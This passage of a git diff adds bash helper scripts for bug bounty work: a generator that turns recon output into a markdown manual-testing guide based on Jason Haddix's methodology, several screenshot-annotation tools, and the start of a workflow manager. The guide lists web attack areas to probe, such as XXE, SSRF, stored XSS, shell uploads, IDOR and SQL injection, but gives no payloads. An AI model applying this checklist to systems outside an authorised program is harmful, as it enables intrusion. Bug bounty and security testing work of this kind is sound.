check_tools
run_bb_recon "$url"
|
||||
353
scripts/pentesting/bb-report-generator
Executable file
353
scripts/pentesting/bb-report-generator
Executable file
|
|
@ -0,0 +1,353 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: bb-report-generator
# Description: Generate bug bounty recon report from bb-recon output
# Based on Jason Haddix's "Find Features First, Bugs Second" philosophy
#
# Usage: bb-report-generator <recon-directory>
# Reads the artifacts produced by bb-recon (nuclei.txt, httpx.txt,
# katana_*.txt, takeover.txt) and writes manual-testing-guide.md
# into that directory.

VERSION="1.0.0"

# Colors
# ANSI escape sequences stored as literal backslash strings; they are
# interpreted at print time via `echo -e` / `printf '%b'`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||
|
||||
# Print CLI usage for bb-report-generator to stdout.
# Relies on the script-level BOLD/NC/VERSION constants.
show_help() {
    printf '%b\n' \
        "${BOLD}bb-report-generator${NC} - Bug Bounty Recon Report Generator v${VERSION}" \
        "" \
        "${BOLD}USAGE:${NC}" \
        " bb-report-generator <recon-directory>" \
        "" \
        "${BOLD}DESCRIPTION:${NC}" \
        " Analyzes bb-recon output and generates prioritized manual testing guide" \
        " Based on Jason Haddix's Bug Hunter Methodology" \
        "" \
        "${BOLD}EXAMPLES:${NC}" \
        " bb-report-generator ./bb-recon-target.com-20240101-120000" \
        " bb-report-generator ./bb-recon-*" \
        "" \
        "${BOLD}OUTPUT:${NC}" \
        " Creates manual-testing-guide.md in the recon directory"
}
|
||||
|
||||
# ---- CLI handling & banner ----------------------------------------------

# Help requested (or nothing passed at all).
if (( $# == 0 )) || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

RECON_DIR="$1"

# The recon directory must already exist (it is produced by bb-recon).
if [[ ! -d "$RECON_DIR" ]]; then
    printf '%b\n' "${RED}Error:${NC} Directory not found: $RECON_DIR"
    exit 1
fi

printf '%b\n' "${CYAN}${BOLD}"
printf '%s\n' \
    "╔════════════════════════════════════════════════════════════╗" \
    "║ Bug Bounty Recon Report Generator ║" \
    "║ Jason Haddix Methodology: Features → Bugs ║" \
    "╚════════════════════════════════════════════════════════════╝"
printf '%b\n' "${NC}"

# Every section below appends to this markdown file.
REPORT_FILE="$RECON_DIR/manual-testing-guide.md"
|
||||
|
||||
# Start report.
# The static methodology text is written through a *quoted* heredoc — it
# contains backticks and $-signs that must stay literal. Because of that
# quoting, the old version's "**Generated:** $(date)" line was never
# expanded and the report literally contained the text "$(date)". The
# timestamp line is therefore emitted separately with printf.
{
    printf '%s\n' '# Bug Bounty Manual Testing Guide'
    printf '\n'
    printf '**Generated:** %s\n' "$(date)"
    cat << 'EOF'
**Philosophy:** Find FEATURES first, then BUGS second (Jason Haddix)

---

## 🎯 High Priority Testing Areas

Based on Jason Haddix's "Heat Map" - where bugs normally hide:

### 1. Upload Functions 🔥 (HIGHEST PRIORITY)
**Why:** Always vulnerable! XSS, XXE, SSRF, Shell upload

**Actions:**
- [ ] Find all file upload endpoints
- [ ] Test XML-based uploads (Docs/PDFs) for XXE and SSRF
- [ ] Test image uploads for XSS in filename/EXIF/binary header
- [ ] Check where uploaded files are stored (S3 misconfigurations?)
- [ ] Try polyglot files (valid image + shell code)

### 2. APIs 🔥
**Why:** Hidden HTTP methods, lack of auth, mass assignment, excessive data exposure

**Actions:**
- [ ] Test PUT, DELETE, PATCH methods (not just GET/POST)
- [ ] Check for missing authentication
- [ ] Test for mass assignment vulnerabilities
- [ ] Look for excessive data exposure in responses
- [ ] Analyze API versioning (v1, v2, etc.) for inconsistencies

### 3. Account Section (Profile/Settings) 🔥
**Why:** Stored XSS, SSTI, SSRF

**Actions:**
- [ ] Test ALL custom fields for Stored XSS
- [ ] Check bio, name, location, custom fields
- [ ] Test webhook URLs and callback URLs for SSRF
- [ ] Look for integrations that import external content

### 4. Content Types 🔥
**Why:** Multipart-forms "always have a vulnerability"

**Actions:**
- [ ] Test `multipart/form-data` for shell uploads, injections, bypasses
- [ ] Test `Content-Type: application/xml` for XXE
- [ ] Test `Content-Type: application/json` for API vulnerabilities

### 5. Error Messages
**Why:** Information disclosure, exotic injection vectors

**Actions:**
- [ ] Trigger errors intentionally
- [ ] Check stack traces for paths, versions, database types
- [ ] Test for Application DoS via resource exhaustion

### 6. URLs/Paths as Values
**Why:** SSRF, Open Redirects

**Actions:**
- [ ] Find parameters like: `?url=`, `?redirect=`, `?next=`, `?callback=`
- [ ] Test for SSRF vulnerabilities
- [ ] Test for open redirects

---

## 📊 Recon Summary

EOF
} > "$REPORT_FILE"
|
||||
|
||||
# Add Technology Stack section.
# Prefers httpx output; falls back to whatweb; otherwise notes the gap.
echo "### Technology Stack Identified" >> "$REPORT_FILE"
echo >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/httpx.txt" ]]; then
    echo "**Technologies detected (httpx):**" >> "$REPORT_FILE"
    echo '```' >> "$REPORT_FILE"
    # head reads the file directly — the old `cat file | head -20`
    # spawned an extra process for nothing.
    head -n 20 "$RECON_DIR/httpx.txt" >> "$REPORT_FILE"
    echo '```' >> "$REPORT_FILE"
elif [[ -f "$RECON_DIR/whatweb.txt" ]]; then
    echo "**Technologies detected (whatweb):**" >> "$REPORT_FILE"
    # Extract the bracketed [Tech] tokens whatweb emits; the `|| echo`
    # covers the pipefail case where grep matches nothing.
    grep -oE '\[[^\]]+\]' "$RECON_DIR/whatweb.txt" | sort -u | head -20 >> "$REPORT_FILE" || echo "None found" >> "$REPORT_FILE"
else
    echo "*No technology fingerprinting data available*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add Nuclei Findings section (count + first 20 findings, fenced).
{
    echo "### Nuclei Findings (Info/Low Severity)"
    echo
} >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/nuclei.txt" && -s "$RECON_DIR/nuclei.txt" ]]; then
    NUCLEI_COUNT=$(wc -l < "$RECON_DIR/nuclei.txt")
    {
        echo "**Total findings:** $NUCLEI_COUNT"
        echo
        echo '```'
        head -20 "$RECON_DIR/nuclei.txt"
        echo '```'
    } >> "$REPORT_FILE"
else
    echo "*No Nuclei findings*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add Subdomain Takeover section; a non-empty takeover.txt is treated
# as a positive hit and dumped verbatim.
{
    echo "### Subdomain Takeover Check"
    echo
} >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/takeover.txt" && -s "$RECON_DIR/takeover.txt" ]]; then
    {
        echo "**⚠️ POTENTIAL TAKEOVER VULNERABILITIES FOUND!**"
        echo
        echo '```'
        cat "$RECON_DIR/takeover.txt"
        echo '```'
    } >> "$REPORT_FILE"
else
    echo "✅ No subdomain takeover vulnerabilities detected" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add Endpoints Discovered section (crawled URL count + sample).
{
    echo "### Endpoints Discovered (Katana Crawler)"
    echo
} >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/katana_urls.txt" && -s "$RECON_DIR/katana_urls.txt" ]]; then
    URL_COUNT=$(wc -l < "$RECON_DIR/katana_urls.txt")
    {
        echo "**Total URLs crawled:** $URL_COUNT"
        echo
        echo "**Sample URLs (first 20):**"
        echo '```'
        head -20 "$RECON_DIR/katana_urls.txt"
        echo '```'
    } >> "$REPORT_FILE"
else
    echo "*No URLs discovered*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add JavaScript Endpoints section (paths pulled out of crawled JS).
{
    echo "### JavaScript Endpoints & Paths"
    echo
} >> "$REPORT_FILE"
if [[ -f "$RECON_DIR/katana_paths.txt" && -s "$RECON_DIR/katana_paths.txt" ]]; then
    PATH_COUNT=$(wc -l < "$RECON_DIR/katana_paths.txt")
    {
        echo "**Total paths discovered:** $PATH_COUNT"
        echo
        echo "**Interesting paths (first 20):**"
        echo '```'
        head -20 "$RECON_DIR/katana_paths.txt"
        echo '```'
    } >> "$REPORT_FILE"
else
    echo "*No JavaScript paths discovered*" >> "$REPORT_FILE"
fi
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add "The Big 6 Questions" section.
# Static methodology text; the quoted 'EOF' delimiter keeps the
# backticks and $-signs in the markdown literal (no expansion).
cat >> "$REPORT_FILE" << 'EOF'

---

## 🔍 The Big 6 Questions (Jason Haddix)

Answer these before testing:

### 1. How does the app pass data?
**Map ALL input methods:**
- [ ] GET parameters
- [ ] POST parameters
- [ ] JSON body data
- [ ] XML body data
- [ ] Cookies
- [ ] Custom headers (X-*)
- [ ] WebSocket messages
- [ ] GraphQL queries

### 2. How/Where does the app talk about users?
**Find user identifiers for IDOR/Authorization testing:**
- [ ] User IDs in URLs
- [ ] UUIDs
- [ ] Email addresses
- [ ] Usernames
- [ ] Session tokens
- [ ] JWT tokens (decode and analyze!)

**Tip:** IDOR → XSS chain for higher severity!

### 3. Does the site have multi-tenancy or user levels?
**Test for authorization bugs:**
- [ ] Regular user vs Admin
- [ ] Free tier vs Premium tier
- [ ] Organization A vs Organization B
- [ ] Test horizontal access (User A → User B data)
- [ ] Test vertical access (User → Admin escalation)

**Use Burp's Autorize extension!**

### 4. Does the site have a unique threat model?
**Beyond PII, look for:**
- [ ] API keys and secrets (developer portals)
- [ ] Doxing opportunities (social platforms)
- [ ] Financial data (payment platforms)
- [ ] Healthcare data (HIPAA)

### 5. Has there been past security research?
**Search for previous vulnerabilities:**
- [ ] HackerOne disclosed reports
- [ ] Bugcrowd disclosures
- [ ] CVE databases
- [ ] Security researcher blogs
- [ ] Conference presentations

**Google:** `site:hackerone.com "target.com" disclosed`

### 6. How does the app handle XSS? CSRF? Injection?
**Understand defenses:**
- [ ] WAF presence (Cloudflare, Akamai, ModSecurity)
- [ ] XSS filters (CSP, Chrome Auditor)
- [ ] CSRF tokens (present? validated? reusable?)
- [ ] Input sanitization
- [ ] Output encoding

**Adaptive Strategy:** Don't waste time on hardened areas - find soft spots!

---

## 📋 Manual Testing Checklist

Based on findings, prioritize testing:

### Phase 1: Quick Wins
- [ ] Test all file upload endpoints (if any)
- [ ] Check for subdomain takeovers (already scanned)
- [ ] Test exposed admin panels (from Nuclei)
- [ ] Check for default credentials
- [ ] Test open redirects in `?url=` parameters

### Phase 2: Authorization Testing
- [ ] Create 2+ accounts at different privilege levels
- [ ] Test IDOR on all endpoints with user identifiers
- [ ] Test horizontal access (User A → User B)
- [ ] Test vertical access (User → Admin)
- [ ] Use Burp Autorize for automated testing

### Phase 3: Input Validation
- [ ] Test XSS in all input fields
- [ ] Test SQL injection in parameters
- [ ] Test SSRF in URL/webhook parameters
- [ ] Test XXE in XML endpoints
- [ ] Test SSTI in template fields

### Phase 4: Business Logic
- [ ] Test race conditions (payments, redemptions)
- [ ] Test negative quantities
- [ ] Test price manipulation
- [ ] Test insecure password reset flows

### Phase 5: Deep Dive
- [ ] JavaScript analysis for hidden endpoints
- [ ] API testing (hidden methods, versions)
- [ ] Session management testing
- [ ] CSRF testing

---

## 🛠️ Recommended Tools for Manual Testing

**Burp Suite Extensions:**
- LinkFinder - Parse JS for endpoints
- Hunt Scanner RMX - Highlight interesting parameters
- Autorize - Automated authorization testing
- Burp Bounty - Custom scan checks + Blind XSS

**Command-line:**
- `sqlmap` - SQL injection testing
- `ffuf` - Directory/parameter fuzzing (if needed)
- `dalfox` - XSS scanner
- `nuclei` - CVE and exploit template scanning

**Remember:** Run aggressive tools ONLY if within bug bounty program rules!

---

## 📚 Resources

- [Jason Haddix - The Bug Hunter's Methodology](https://www.youtube.com/watch?v=uKWu6yhnhbQ)
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [HackerOne Disclosed Reports](https://hackerone.com/hacktivity)

---

**Generated by bb-report-generator v1.0.0**
EOF
|
||||
|
||||
# Final summary for the operator.
printf '%b\n' "${GREEN}✓ Report generated:${NC} $REPORT_FILE"
echo
printf '%b\n' "${CYAN}Next steps:${NC}"
printf '%s\n' \
    " 1. Read the manual testing guide" \
    " 2. Answer 'The Big 6 Questions'" \
    " 3. Follow the prioritized testing checklist" \
    " 4. Find FEATURES first, then BUGS second!"
|
||||
67
scripts/pentesting/bb-screenshot
Executable file
67
scripts/pentesting/bb-screenshot
Executable file
|
|
@ -0,0 +1,67 @@
|
|||
#!/usr/bin/env bash
# Bug Bounty Screenshot Helper with Automatic Borders and Annotations
# Usage: bb-screenshot.sh [program-name]
#
# Captures a screenshot via Flameshot, frames it with a border and
# drop shadow (ImageMagick), stores it under the program's screenshots
# directory and copies the relative path to the clipboard.

set -euo pipefail

PROGRAM="${1:-current}"
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_screenshot.png"

# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Fail early with a clear message if a required tool is missing.
for tool in flameshot convert; do
    if ! command -v "$tool" &>/dev/null; then
        echo -e "${YELLOW}[!] Required tool not installed: $tool${NC}" >&2
        exit 1
    fi
done

# Ensure screenshot directory exists
mkdir -p "$SCREENSHOT_DIR"

echo -e "${BLUE}[+] Bug Bounty Screenshot Tool${NC}"
echo -e "${YELLOW}[!] Take your screenshot, annotate as needed, then click Save${NC}"
echo ""

# Take screenshot with Flameshot (with annotation tools).
# Flameshot exits non-zero when the capture is aborted; without the
# `|| true` guard, `set -e` would kill the script before the
# cancellation check below ever runs.
flameshot gui -p "$TEMP_FILE" || true

# Check if screenshot was actually taken (user might have cancelled)
if [[ ! -f "$TEMP_FILE" ]]; then
    echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
    exit 0
fi

echo -e "${GREEN}[✓] Screenshot captured${NC}"
echo -e "${BLUE}[+] Adding professional border...${NC}"

# Add border and shadow using ImageMagick
convert "$TEMP_FILE" \
    -bordercolor '#333333' -border 2 \
    -bordercolor white -border 10 \
    -bordercolor '#333333' -border 2 \
    \( +clone -background black -shadow 80x5+5+5 \) \
    +swap -background white -layers merge +repage \
    "$FINAL_FILE"

# Remove temp file
rm -f -- "$TEMP_FILE"

echo -e "${GREEN}[✓] Screenshot saved with border: $FINAL_FILE${NC}"
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"

# Copy filename to clipboard (for easy paste into JSON);
# try X11 (xclip) first, then Wayland (wl-copy).
echo "screenshots/$(basename "$FINAL_FILE")" | xclip -selection clipboard 2>/dev/null || \
    echo "screenshots/$(basename "$FINAL_FILE")" | wl-copy 2>/dev/null || \
    echo -e "${YELLOW}[!] Could not copy to clipboard (install xclip or wl-clipboard)${NC}"

echo ""
echo -e "${GREEN}Path copied: screenshots/$(basename "$FINAL_FILE")${NC}"
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON file${NC}"

# Optional: Open the screenshot to verify
if command -v feh &> /dev/null; then
    feh "$FINAL_FILE" &
elif command -v eog &> /dev/null; then
    eog "$FINAL_FILE" &
fi
|
||||
178
scripts/pentesting/bb-screenshot-annotate
Executable file
178
scripts/pentesting/bb-screenshot-annotate
Executable file
|
|
@ -0,0 +1,178 @@
|
|||
#!/usr/bin/env bash
# Advanced Bug Bounty Screenshot with Pre-made Annotation Templates
# Usage: bb-screenshot-annotate.sh <program> <type>
# Types: vulnerability, proof, request, response, comparison, evidence

set -euo pipefail

# Print full CLI help (static text, no expansion needed).
show_usage() {
    cat << 'EOF'
Bug Bounty Screenshot Annotation Tool

Usage: bb-screenshot-annotate.sh <program> <type>

Screenshot Types:
  vulnerability - Highlighting the vulnerability (red arrows/boxes)
  proof - Proof of exploitation (green success indicators)
  request - HTTP request in Burp Suite
  response - HTTP response showing vulnerability
  comparison - Before/After comparison
  evidence - General evidence screenshot

Examples:
  bb-screenshot-annotate.sh juice-shop vulnerability
  bb-screenshot-annotate.sh acme proof
  bb-screenshot-annotate.sh target request

Tips:
  - Use Flameshot's built-in tools for annotation:
    * Arrow (for pointing)
    * Rectangle (for highlighting)
    * Text (for labels)
    * Pixelate (for redacting sensitive data)
  - Red for vulnerabilities
  - Green for successful exploitation
  - Yellow for important notes

EOF
}

# Handle -h/--help BEFORE touching the filesystem: previously the
# mkdir ran first, so `bb-screenshot-annotate -h` created a literal
# ~/bug-bounty/-h/screenshots directory.
if [[ "${1:-}" == "-h" ]] || [[ "${1:-}" == "--help" ]]; then
    show_usage
    exit 0
fi

PROGRAM="${1:-current}"
TYPE="${2:-vulnerability}"
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_${TYPE}.png"

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Display tips based on screenshot type (this case also validates TYPE).
case "$TYPE" in
    vulnerability)
        echo -e "${RED}[!] VULNERABILITY SCREENSHOT${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Use RED arrows to point at the vulnerability"
        echo " - Use RED rectangles to highlight affected areas"
        echo " - Add text labels explaining what's wrong"
        ;;
    proof)
        echo -e "${GREEN}[!] PROOF OF EXPLOITATION${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Show successful exploitation result"
        echo " - Highlight important output (session cookies, data, etc.)"
        echo " - Use GREEN to show success"
        ;;
    request)
        echo -e "${BLUE}[!] HTTP REQUEST SCREENSHOT${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Capture Burp Suite request"
        echo " - Highlight malicious payload in RED"
        echo " - Show request method and endpoint clearly"
        ;;
    response)
        echo -e "${BLUE}[!] HTTP RESPONSE SCREENSHOT${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Capture server response"
        echo " - Highlight vulnerability indicators (errors, data leaks)"
        echo " - Show status code and response headers"
        ;;
    comparison)
        echo -e "${YELLOW}[!] BEFORE/AFTER COMPARISON${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Show side-by-side comparison"
        echo " - Label 'BEFORE' and 'AFTER' clearly"
        echo " - Highlight the difference"
        ;;
    evidence)
        echo -e "${BLUE}[!] GENERAL EVIDENCE${NC}"
        echo -e "${YELLOW}Tips:${NC}"
        echo " - Capture relevant evidence"
        echo " - Annotate important details"
        echo " - Keep it clear and professional"
        ;;
    *)
        echo -e "${RED}[-] Unknown type: $TYPE${NC}"
        echo "Valid types: vulnerability, proof, request, response, comparison, evidence"
        exit 1
        ;;
esac

# Create the output directory only after TYPE has been validated, so a
# typo'd invocation leaves no empty directories behind.
mkdir -p "$SCREENSHOT_DIR"

echo ""
echo -e "${BLUE}[+] Opening Flameshot...${NC}"
echo -e "${YELLOW}[!] Annotate your screenshot, then click Save${NC}"
echo ""

# Take screenshot with Flameshot (with annotation tools).
# Flameshot exits non-zero when the capture is aborted; `|| true`
# keeps `set -e` from killing the script before the cancellation
# check below runs.
flameshot gui -p "$TEMP_FILE" || true

# Check if screenshot was actually taken
if [[ ! -f "$TEMP_FILE" ]]; then
    echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
    exit 0
fi

echo -e "${GREEN}[✓] Screenshot captured${NC}"
echo -e "${BLUE}[+] Adding professional border and shadow...${NC}"

# Border colour encodes the screenshot type; TYPE was validated above,
# so no default arm is needed here.
case "$TYPE" in
    vulnerability)
        BORDER_COLOR='#DC143C' # Crimson red
        ;;
    proof)
        BORDER_COLOR='#228B22' # Forest green
        ;;
    request|response)
        BORDER_COLOR='#4169E1' # Royal blue
        ;;
    comparison)
        BORDER_COLOR='#FF8C00' # Dark orange
        ;;
    evidence)
        BORDER_COLOR='#696969' # Dim gray
        ;;
esac

# Add colored border, white mat, outer border, and drop shadow
convert "$TEMP_FILE" \
    -bordercolor "$BORDER_COLOR" -border 3 \
    -bordercolor white -border 12 \
    -bordercolor '#333333' -border 1 \
    \( +clone -background black -shadow 80x5+8+8 \) \
    +swap -background white -layers merge +repage \
    "$FINAL_FILE"

# Remove temp file
rm -f -- "$TEMP_FILE"

echo -e "${GREEN}[✓] Screenshot saved: $FINAL_FILE${NC}"
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"

# Copy relative path to clipboard (X11 first, then Wayland).
RELATIVE_PATH="screenshots/$(basename "$FINAL_FILE")"
echo "$RELATIVE_PATH" | xclip -selection clipboard 2>/dev/null || \
    echo "$RELATIVE_PATH" | wl-copy 2>/dev/null || \
    echo -e "${YELLOW}[!] Could not copy to clipboard${NC}"

echo ""
echo -e "${GREEN}Path: $RELATIVE_PATH${NC}"
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON:${NC}"
echo -e ' "path": "'"$RELATIVE_PATH"'",'

# Show in file manager
if command -v xdg-open &> /dev/null; then
    xdg-open "$(dirname "$FINAL_FILE")" &
fi
|
||||
52
scripts/pentesting/bb-screenshot-batch
Executable file
52
scripts/pentesting/bb-screenshot-batch
Executable file
|
|
@ -0,0 +1,52 @@
|
|||
#!/usr/bin/env bash
# Batch process existing screenshots with borders
# Usage: bb-screenshot-batch.sh <directory>
#
# Applies the standard bb-screenshot border + drop shadow to every
# PNG/JPG directly inside <directory> (non-recursive), writing the
# framed copies to <directory>/processed.

set -euo pipefail

SOURCE_DIR="${1:-.}"
OUTPUT_DIR="${SOURCE_DIR}/processed"

if [[ ! -d "$SOURCE_DIR" ]]; then
    echo "Error: Directory not found: $SOURCE_DIR" >&2
    exit 1
fi

# ImageMagick is the only hard dependency; fail early if absent.
if ! command -v convert &>/dev/null; then
    echo "Error: ImageMagick 'convert' is required" >&2
    exit 1
fi

mkdir -p "$OUTPUT_DIR"

echo "[+] Processing screenshots in: $SOURCE_DIR"
echo "[+] Output directory: $OUTPUT_DIR"
echo ""

# Collect all PNG and JPG images into an array (robust to spaces in
# file names, unlike iterating over a newline-joined string).
mapfile -t IMAGES < <(find "$SOURCE_DIR" -maxdepth 1 \( -name "*.png" -o -name "*.jpg" -o -name "*.jpeg" \) | sort)

if [[ ${#IMAGES[@]} -eq 0 ]]; then
    echo "[-] No images found in $SOURCE_DIR"
    exit 1
fi

COUNT=0
TOTAL=${#IMAGES[@]}

for IMAGE in "${IMAGES[@]}"; do
    # NOTE: the old `((COUNT++))` returned status 1 while COUNT was 0,
    # which aborted the whole script under `set -e` on the very first
    # image; plain arithmetic assignment has no such trap.
    COUNT=$((COUNT + 1))
    FILENAME=$(basename "$IMAGE")
    OUTPUT_FILE="$OUTPUT_DIR/$FILENAME"

    echo "[$COUNT/$TOTAL] Processing: $FILENAME"

    # Add professional border and shadow
    convert "$IMAGE" \
        -bordercolor '#333333' -border 2 \
        -bordercolor white -border 10 \
        -bordercolor '#333333' -border 2 \
        \( +clone -background black -shadow 80x5+5+5 \) \
        +swap -background white -layers merge +repage \
        "$OUTPUT_FILE"
done

echo ""
echo "[✓] Processed $COUNT images"
echo "[✓] Output: $OUTPUT_DIR"
|
||||
259
scripts/pentesting/bb-workflow
Executable file
259
scripts/pentesting/bb-workflow
Executable file
|
|
@ -0,0 +1,259 @@
|
|||
#!/usr/bin/env bash
|
||||
# Bug Bounty Workflow Helper
|
||||
# Manages the complete workflow from recon to report
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
PROGRAM="${1:-}"
|
||||
DOMAIN="${2:-}"
|
||||
BB_ROOT="${HOME}/bug-bounty"
|
||||
TEMPLATE_DIR="${HOME}/.claude/context/business/security/bug-bounty"
|
||||
|
||||
# Colors
|
||||
RED='\033[0;31m'
|
||||
GREEN='\033[0;32m'
|
||||
YELLOW='\033[1;33m'
|
||||
BLUE='\033[0;34m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
show_usage() {
|
||||
cat << EOF
|
||||
Bug Bounty Workflow Helper
|
||||
|
||||
Usage: bb-workflow.sh <command> [args]
|
||||
|
||||
Commands:
|
||||
init <program> <domain> Initialize directory structure for new program
|
||||
recon <program> Run reconnaissance on program
|
||||
test <program> <url> <type> Quick vulnerability test helper
|
||||
screenshot <program> [type] Take annotated screenshot with border
|
||||
report <program> <vuln-id> Generate PDF report from JSON
|
||||
status <program> Show program status and findings
|
||||
|
||||
Examples:
|
||||
bb-workflow.sh init acme acme.com
|
||||
bb-workflow.sh recon acme
|
||||
bb-workflow.sh test acme http://localhost:3002 xss
|
||||
bb-workflow.sh screenshot acme vulnerability
|
||||
bb-workflow.sh report acme acme-xss-001
|
||||
|
||||
Directory Structure:
|
||||
~/bug-bounty/<program>/
|
||||
├── recon/ # Reconnaissance data
|
||||
├── screenshots/ # Evidence screenshots
|
||||
├── discoveries/ # Vulnerability JSON files
|
||||
└── reports/ # Generated PDF reports
|
||||
EOF
|
||||
}
|
||||
|
||||
init_program() {
|
||||
local program="$1"
|
||||
local domain="$2"
|
||||
|
||||
echo -e "${BLUE}[+] Initializing bug bounty program: $program${NC}"
|
||||
|
||||
mkdir -p "$BB_ROOT/$program"/{recon,screenshots,discoveries,reports}
|
||||
|
||||
# Create program info file
|
||||
cat > "$BB_ROOT/$program/info.txt" << EOF
|
||||
Program: $program
|
||||
Domain: $domain
|
||||
Started: $(date +%Y-%m-%d)
|
||||
Platform: [HackerOne/Bugcrowd/Other]
|
||||
Scope: [Add scope notes]
|
||||
|
||||
Rules:
|
||||
- [Add important rules from program policy]
|
||||
|
||||
Notes:
|
||||
- [Add your notes here]
|
||||
EOF
|
||||
|
||||
# Create .gitignore
|
||||
cat > "$BB_ROOT/$program/.gitignore" << EOF
|
||||
# Sensitive bug bounty data
|
||||
screenshots/
|
||||
discoveries/*.json
|
||||
reports/*.pdf
|
||||
recon/
|
||||
|
||||
# Keep directory structure
|
||||
!discoveries/.gitkeep
|
||||
!screenshots/.gitkeep
|
||||
!reports/.gitkeep
|
||||
!recon/.gitkeep
|
||||
EOF
|
||||
|
||||
touch "$BB_ROOT/$program"/{discoveries,screenshots,reports,recon}/.gitkeep
|
||||
|
||||
echo -e "${GREEN}[✓] Program initialized: $BB_ROOT/$program${NC}"
|
||||
echo -e "${YELLOW}[!] Edit info.txt with program details${NC}"
|
||||
}
|
||||
|
||||
run_recon() {
|
||||
local program="$1"
|
||||
local program_dir="$BB_ROOT/$program"
|
||||
|
||||
if [[ ! -d "$program_dir" ]]; then
|
||||
echo -e "${RED}[-] Program directory not found: $program_dir${NC}"
|
||||
echo -e "${YELLOW}[!] Run: bb-workflow.sh init $program <domain>${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Get domain from info.txt
|
||||
local domain=$(grep "^Domain:" "$program_dir/info.txt" | cut -d' ' -f2)
|
||||
|
||||
if [[ -z "$domain" ]]; then
|
||||
echo -e "${RED}[-] Domain not found in info.txt${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BLUE}[+] Running reconnaissance on $domain${NC}"
|
||||
echo -e "${YELLOW}[!] This will take some time...${NC}"
|
||||
|
||||
cd "$program_dir/recon"
|
||||
|
||||
# Run your existing recon scripts
|
||||
if [[ -x "${HOME}/scripts/passive-recon" ]]; then
|
||||
echo -e "${BLUE}[+] Running passive recon...${NC}"
|
||||
"${HOME}/scripts/passive-recon" "$domain"
|
||||
fi
|
||||
|
||||
if [[ -x "${HOME}/scripts/light-recon" ]]; then
|
||||
echo -e "${BLUE}[+] Running light recon...${NC}"
|
||||
"${HOME}/scripts/light-recon" "$domain"
|
||||
fi
|
||||
|
||||
if [[ -x "${HOME}/scripts/bb-recon" ]]; then
|
||||
echo -e "${BLUE}[+] Running bug bounty recon (safe mode)...${NC}"
|
||||
"${HOME}/scripts/bb-recon" "https://$domain"
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}[✓] Reconnaissance complete!${NC}"
|
||||
echo -e "${YELLOW}[!] Review results in: $program_dir/recon/${NC}"
|
||||
|
||||
# Generate manual testing guide
|
||||
if [[ -x "${HOME}/scripts/bb-report-generator" ]]; then
|
||||
echo -e "${BLUE}[+] Generating manual testing guide...${NC}"
|
||||
# Find the most recent bb-recon directory
|
||||
latest_recon=$(find . -maxdepth 1 -type d -name "bb-recon-*" -printf '%T@ %p\n' | sort -rn | head -1 | cut -d' ' -f2)
|
||||
if [[ -n "$latest_recon" ]]; then
|
||||
"${HOME}/scripts/bb-report-generator" "$latest_recon"
|
||||
echo -e "${GREEN}[✓] Manual testing guide created!${NC}"
|
||||
echo -e "${CYAN}[*] Read: $latest_recon/manual-testing-guide.md${NC}"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
quick_test() {
|
||||
local program="$1"
|
||||
local url="$2"
|
||||
local type="$3"
|
||||
|
||||
echo -e "${BLUE}[+] Quick vulnerability test: $type${NC}"
|
||||
"${HOME}/scripts/quick-vuln-test.sh" "$url" "$type"
|
||||
}
|
||||
|
||||
take_screenshot() {
|
||||
local program="$1"
|
||||
local type="${2:-evidence}"
|
||||
|
||||
if [[ ! -d "$BB_ROOT/$program" ]]; then
|
||||
echo -e "${RED}[-] Program directory not found: $program${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
"${HOME}/scripts/bb-screenshot-annotate.sh" "$program" "$type"
|
||||
}
|
||||
|
||||
generate_report() {
|
||||
local program="$1"
|
||||
local vuln_id="$2"
|
||||
local program_dir="$BB_ROOT/$program"
|
||||
|
||||
